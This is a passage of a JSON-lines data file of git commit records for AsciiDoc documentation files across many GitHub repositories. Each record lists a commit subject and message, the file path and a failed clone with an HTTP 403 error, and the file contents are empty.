goals\n","repos":"pkleimann\/livingdoc,Drakojin\/livingdoc2,LivingDoc\/livingdoc,LivingDoc\/livingdoc,pkleimann\/livingdoc,testIT-LivingDoc\/livingdoc2,Drakojin\/livingdoc2,bitterblue\/livingdoc2,pkleimann\/livingdoc,bitterblue\/livingdoc2,testIT-LivingDoc\/livingdoc2,bitterblue\/livingdoc2,LivingDoc\/livingdoc,pkleimann\/livingdoc2,Drakojin\/livingdoc2,pkleimann\/livingdoc2","old_file":"doc\/qualitygoals.adoc","new_file":"doc\/qualitygoals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitterblue\/livingdoc2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dbf73c4692581ffc416912744b5224497cb8284f","subject":"Update spring-security-config module description","message":"Update spring-security-config module description\n\nInclude Java Configuration in the description.\n\nFixes gh-3298\n","repos":"mdeinum\/spring-security,fhanik\/spring-security,wkorando\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,SanjayUser\/SpringSecurityPro,mdeinum\/spring-security,rwinch\/spring-security,pwheel\/spring-security,mdeinum\/spring-security,kazuki43zoo\/spring-security,pwheel\/spring-security,kazuki43zoo\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,eddumelendez\/spring-security,eddumelendez\/spring-security,kazuki43zoo\/spring-security,rwinch\/spring-security,olezhuravlev\/spring-security,olezhuravlev\/spring-security,fhanik\/spring-security,thomasdarimont\/spring-security,olezhuravlev\/spring-security,fhanik\/spring-security,fhanik\/spring-security,ollie314\/spring-security,wkorando\/spring-security,spring-projects\/spring-security,thomasdarimont\/spring-security,spring-projects\/spring-security,kazuki43zoo\/spring-security,djechelon\/spring-security,pwheel\/spring-security,olezhuravlev\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,SanjayUser\/SpringSecurityPro,ollie314\/spring-security,thomasdarimont\/spring-security,thomasdarimont\/spring-security,pwheel\/spring-security,djechelon\/spring-security,mdeinum\/spring-security,wkorando\/spring-security,SanjayUser\/SpringSecurityPro,jgrandja\/spring-security,spring-projects\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,thomasdarimont\/spring-security,fhanik\/spring-security,djechelon\/spring-security,wkorando\/spring-security,kazuki43zoo\/spring-security,ollie314\/spring-security,SanjayUser\/SpringSecurityPro,ollie314\/spring-security,djechelon\/spring-security,pwheel\/spring-security,SanjayUser\/SpringSecurityPro,olezhuravlev\/spring-security,jgrandja\/spring-security,eddumelendez\/spring-security,eddumelendez\/spring-security,spring-projects\/spring-security,rwinch\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"96d8c9d326cc66b4b968cb2df4caaddbf73aa363","subject":"Added software document","message":"Added software document\n\nContains info about used software. Needs to get additional info about\nAWS and Google.\n","repos":"ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1","old_file":"documentation\/software.adoc","new_file":"documentation\/software.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ohaz\/amos-ss15-proj1.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"ef17280fa3f098762864ca5cc4eed12b6d39d364","subject":"Minor fixes on documentation.","message":"Minor fixes on documentation.\n","repos":"funcool\/cats,alesguzik\/cats,mccraigmccraig\/cats,OlegTheCat\/cats,yurrriq\/cats,tcsavage\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"0e32fa9cea1a642abda71535c1bea2fdaa411969","subject":"Deref for 7\/30\/21","message":"Deref for 7\/30\/21\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/07\/30\/deref.adoc","new_file":"content\/news\/2021\/07\/30\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"fa8abea715af01fcfab7bf3d79a675471229eb46","subject":"Update 2017-08-08-Hello-World.adoc","message":"Update 2017-08-08-Hello-World.adoc","repos":"egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io","old_file":"_posts\/2017-08-08-Hello-World.adoc","new_file":"_posts\/2017-08-08-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/egorlitvinenko\/egorlitvinenko.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a31d6d0516f4d15fa97037365be5f664318b90db","subject":"Issue #33 - Create specification document outline","message":"Issue #33 - Create specification document outline\n\nSigned-off-by: Artur Dzmitryieu <0a3f547f43e496c127a2e6339e51bd0a18a1d5ae@ca.ibm.com>\n","repos":"arthurdm\/microprofile-open-api","old_file":"spec\/src\/main\/asciidoc\/microprofile-openapi-spec.adoc","new_file":"spec\/src\/main\/asciidoc\/microprofile-openapi-spec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurdm\/microprofile-open-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"caf8f6ffcdd96cd6f35b2c36d38282092d8585ea","subject":"feat: update documentation","message":"feat: update documentation\n","repos":"Kronos-Integration\/kronos-interceptor-object-data-processor-chunk","old_file":"doc\/index.adoc","new_file":"doc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kronos-Integration\/kronos-interceptor-object-data-processor-chunk.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"7a30f9986678c4814ea983e8ed88e2420845068d","subject":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","message":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f04e573552fbf369a66b469132bf9ee44729dd3b","subject":"y2b create post The Coolest Laptop You've Never Heard Of...","message":"y2b create post The Coolest Laptop You've Never Heard Of...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-17-TheCoolestLaptopYouveNeverHeardOf.adoc","new_file":"_posts\/2017-12-17-TheCoolestLaptopYouveNeverHeardOf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e55b3c6d7f9334f98fe92437c20db668dc5b065","subject":"add adocs","message":"add adocs\n","repos":"przodownikR1\/springBootKata,przodownikR1\/springBootKata","old_file":"docs\/boot.adoc","new_file":"docs\/boot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/przodownikR1\/springBootKata.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d0891c053cf6e2503825b2c30ad6d9abd18c560","subject":"Update 2017-09-30-Android-Developer-Courses.adoc","message":"Update 2017-09-30-Android-Developer-Courses.adoc","repos":"sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io","old_file":"_posts\/2017-09-30-Android-Developer-Courses.adoc","new_file":"_posts\/2017-09-30-Android-Developer-Courses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sidmusa\/sidmusa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1d911f8da868abd8fd5dd9f980ebd331aaa8289","subject":"chore(): add CHANGELOG.adoc","message":"chore(): add CHANGELOG.adoc\n","repos":"gravitee-io\/graviteeio-access-management,gravitee-io\/graviteeio-access-management,gravitee-io\/graviteeio-access-management,gravitee-io\/graviteeio-access-management,gravitee-io\/graviteeio-access-management","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/graviteeio-access-management.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"726d17bbcfb8f406a9c8d87a7dd9db67bde66629","subject":"Update 2015-04-08-Zweites-Posting.adoc","message":"Update 2015-04-08-Zweites-Posting.adoc","repos":"abien\/abien.github.io,abien\/abien.github.io,abien\/abien.github.io,abien\/abien.github.io","old_file":"_posts\/2015-04-08-Zweites-Posting.adoc","new_file":"_posts\/2015-04-08-Zweites-Posting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/abien\/abien.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f42864e4f0369ff08144b2c5e23f16ace140f7d","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7bef3842a35531179911ad7b89b4c7bd07b998e","subject":"Fix spelling mistake in docs","message":"Fix spelling mistake in docs\n","repos":"mccraigmccraig\/cats,yurrriq\/cats,funcool\/cats,OlegTheCat\/cats,alesguzik\/cats,tcsavage\/cats","old_file":"doc\/cats.asciidoc","new_file":"doc\/cats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"505ce88f94261d1692b7ae9cd73fbe0f6a62bd86","subject":"Resolve #4610 Camel-Forge: Create Asciidoc file containing instructions related to Camel-forge","message":"Resolve #4610 Camel-Forge: Create Asciidoc file containing instructions related to Camel-forge\n","repos":"rhuss\/fabric8,dhirajsb\/fabric8,PhilHardwick\/fabric8,zmhassan\/fabric8,zmhassan\/fabric8,dhirajsb\/fabric8,sobkowiak\/fabric8,chirino\/fabric8v2,zmhassan\/fabric8,KurtStam\/fabric8,dhirajsb\/fabric8,sobkowiak\/fabric8,rajdavies\/fabric8,PhilHardwick\/fabric8,rhuss\/fabric8,zmhassan\/fabric8,chirino\/fabric8v2,gashcrumb\/fabric8,chirino\/fabric8v2,rajdavies\/fabric8,christian-posta\/fabric8,christian-posta\/fabric8,gashcrumb\/fabric8,PhilHardwick\/fabric8,PhilHardwick\/fabric8,EricWittmann\/fabric8,KurtStam\/fabric8,EricWittmann\/fabric8,EricWittmann\/fabric8,EricWittmann\/fabric8,dhirajsb\/fabric8,rhuss\/fabric8,rhuss\/fabric8,gashcrumb\/fabric8,KurtStam\/fabric8,sobkowiak\/fabric8,sobkowiak\/fabric8,rajdavies\/fabric8,christian-posta\/fabric8,rajdavies\/fabric8,KurtStam\/fabric8,chirino\/fabric8v2,gashcrumb\/fabric8,christian-posta\/fabric8","old_file":"forge\/addons\/camel\/README.asciidoc","new_file":"forge\/addons\/camel\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chirino\/fabric8v2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d703b83b2f1a3615fbc9d4f7ba8b5fa82cb09c1","subject":"Update 2017-10-05-making-L-A-M-P-by-A-W-S.adoc","message":"Update 2017-10-05-making-L-A-M-P-by-A-W-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-05-making-L-A-M-P-by-A-W-S.adoc","new_file":"_posts\/2017-10-05-making-L-A-M-P-by-A-W-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"808b455c3683988c56f89a780287022968f4c3fd","subject":"Add link to GraphQL as well as the GraphQL specification","message":"Add link to GraphQL as well as the GraphQL specification\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"17318560db34b2f12ae7a8b3984dc70ce875a030","subject":"Add review mins","message":"Add review mins","repos":"rmulvey\/mc,xtuml\/mc,xtuml\/mc,rmulvey\/mc,leviathan747\/mc,lwriemen\/mc,rmulvey\/mc,keithbrown\/mc,keithbrown\/mc,lwriemen\/mc,lwriemen\/mc,keithbrown\/mc,rmulvey\/mc,xtuml\/mc,keithbrown\/mc,leviathan747\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,xtuml\/mc,leviathan747\/mc,leviathan747\/mc,leviathan747\/mc,xtuml\/mc,xtuml\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,leviathan747\/mc,rmulvey\/mc,cortlandstarrett\/mc,rmulvey\/mc,keithbrown\/mc,lwriemen\/mc,cortlandstarrett\/mc,keithbrown\/mc,lwriemen\/mc,lwriemen\/mc","old_file":"doc\/review-minutes\/11571_mcmc_ciera_ant_rvm.adoc","new_file":"doc\/review-minutes\/11571_mcmc_ciera_ant_rvm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f98c05e13d45210edf5aad420c85d5bd85be55fd","subject":"Update 2015-11-28-I-really-wish-that-Microsoft-would-allow-this-feature-to-be-turned-off.adoc","message":"Update 2015-11-28-I-really-wish-that-Microsoft-would-allow-this-feature-to-be-turned-off.adoc","repos":"never-ask-never-know\/never-ask-never-know.github.io,never-ask-never-know\/never-ask-never-know.github.io,never-ask-never-know\/never-ask-never-know.github.io","old_file":"_posts\/2015-11-28-I-really-wish-that-Microsoft-would-allow-this-feature-to-be-turned-off.adoc","new_file":"_posts\/2015-11-28-I-really-wish-that-Microsoft-would-allow-this-feature-to-be-turned-off.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/never-ask-never-know\/never-ask-never-know.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"effecd97334c8e8a16cc8b68c9300cc24e19da4f","subject":"KUDU-1268 - Fix CTAS example in docs","message":"KUDU-1268 - Fix CTAS example in docs\n\nWe had a CTAS example that had the AS SELECT part of the CTAS\nstatement before TBLPROPERTIES, which was wrong. This patch fixes\nthat.\n\nChange-Id: I45a74976bb398d9c91b3b4c82f4b84cc82d621f0\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1505\nReviewed-by: Jean-Daniel Cryans\nTested-by: Jean-Daniel Cryans\n","repos":"InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"64d42b1d293a7e498025faedc53758df9f7a576a","subject":"Create database_migrations.adoc","message":"Create database_migrations.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/database_migrations.adoc","new_file":"userguide\/tutorials\/database_migrations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7733d34350dc10328136d96b048412a1685b52d6","subject":"week4 update","message":"week4 update\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cea7c332f49522dfda76f79ffb3c86f8bbc38d0d","subject":"Refine hawkular setup","message":"Refine hawkular setup\n","repos":"hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/07\/14\/hawkular-miq.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/07\/14\/hawkular-miq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d89331fb6291c96d74df04c3a18e7e23d93c73a","subject":"Add README for 'jenetics.xml' module.","message":"Add README for 'jenetics.xml' module.\n","repos":"jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics","old_file":"org.jenetics.xml\/README.adoc","new_file":"org.jenetics.xml\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenetics\/jenetics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"50301e9e65675b06bfb10ce44069b1cd55fb220c","subject":"Update 2016-08-07-Nodejs-Mongo-D-B-i-O-S.adoc","message":"Update 2016-08-07-Nodejs-Mongo-D-B-i-O-S.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2016-08-07-Nodejs-Mongo-D-B-i-O-S.adoc","new_file":"_posts\/2016-08-07-Nodejs-Mongo-D-B-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c60e1e32e5bb521a69136ff9c9ecaacdd079a4b0","subject":"Update 2016-05-17-docker-clouster-with-rancher.adoc","message":"Update 2016-05-17-docker-clouster-with-rancher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8f6cd14e57d59f5774a900ff6739c9c7326d537","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32a8e0d53529c57790771642c53cbe251b79137e","subject":"Update 2016-07-22-Control-Arms-in-IVIG-Trials.adoc","message":"Update 2016-07-22-Control-Arms-in-IVIG-Trials.adoc","repos":"zubrx\/zubrx.github.io,zubrx\/zubrx.github.io,zubrx\/zubrx.github.io,zubrx\/zubrx.github.io","old_file":"_posts\/2016-07-22-Control-Arms-in-IVIG-Trials.adoc","new_file":"_posts\/2016-07-22-Control-Arms-in-IVIG-Trials.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zubrx\/zubrx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a98c98ccd9f4783ef7bcdd54c350f890bd912d17","subject":"Update 2015-06-12-Desarrollo-de-una-aplicacion-desde-cero-El-origen-de-datos-y-la-carga-inicial-de-datos.adoc","message":"Update 2015-06-12-Desarrollo-de-una-aplicacion-desde-cero-El-origen-de-datos-y-la-carga-inicial-de-datos.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-06-12-Desarrollo-de-una-aplicacion-desde-cero-El-origen-de-datos-y-la-carga-inicial-de-datos.adoc","new_file":"_posts\/2015-06-12-Desarrollo-de-una-aplicacion-desde-cero-El-origen-de-datos-y-la-carga-inicial-de-datos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7641b63854057cb34c87a3bffe618123b6760db3","subject":"Correct DOCTYPE of GWT widgetset","message":"Correct DOCTYPE of GWT widgetset","repos":"Darsstar\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework","old_file":"documentation\/clientside\/clientside-module.asciidoc","new_file":"documentation\/clientside\/clientside-module.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"64e1867aab2312a1838ed5d2e6dd991e329f244f","subject":"Other kill features","message":"Other kill features\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"9b65dadffe6e6bca82846bd056ee0b1e76abb57f","subject":"Update 2015-09-25-Blog-simplified.adoc","message":"Update 2015-09-25-Blog-simplified.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Blog-simplified.adoc","new_file":"_posts\/2015-09-25-Blog-simplified.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"affea85dc6cb01e69b4ff9dbe17be39f0885823d","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47990848f71bd79893a039456f2a4e57cc5bb49b","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0466d26bec7254a4b6e7e3da2701184e068b08a7","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6486ad1697e95369e53676c5d0bc1a6bf07fbc5c","subject":"Added Camel 2.17.5 release notes to docs","message":"Added Camel 2.17.5 release notes to docs\n","repos":"objectiser\/camel,gnodet\/camel,kevinearls\/camel,objectiser\/camel,cunningt\/camel,punkhorn\/camel-upstream,kevinearls\/camel,alvinkwekel\/camel,DariusX\/camel,onders86\/camel,apache\/camel,jamesnetherton\/camel,apache\/camel,jamesnetherton\/camel,jamesnetherton\/camel,cunningt\/camel,gnodet\/camel,zregvart\/camel,CodeSmell\/camel,punkhorn\/camel-upstream,objectiser\/camel,Fabryprog\/camel,apache\/camel,kevinearls\/camel,kevinearls\/camel,cunningt\/camel,christophd\/camel,christophd\/camel,CodeSmell\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,adessaigne\/camel,pmoerenhout\/camel,davidkarlsen\/camel,sverkera\/camel,DariusX\/camel,tdiesler\/camel,tdiesler\/camel,zregvart\/camel,Fabryprog\/camel,pmoerenhout\/camel,CodeSmell\/camel,onders86\/camel,zregvart\/camel,tadayosi\/camel,apache\/camel,pmoerenhout\/camel,sverkera\/camel,anoordover\/camel,tadayosi\/camel,sverkera\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,onders86\/camel,mcollovati\/camel,pmoerenhout\/camel,tadayosi\/camel,anoordover\/camel,anoordover\/camel,tdiesler\/camel,alvinkwekel\/camel,mcollovati\/camel,cunningt\/camel,sverkera\/camel,ades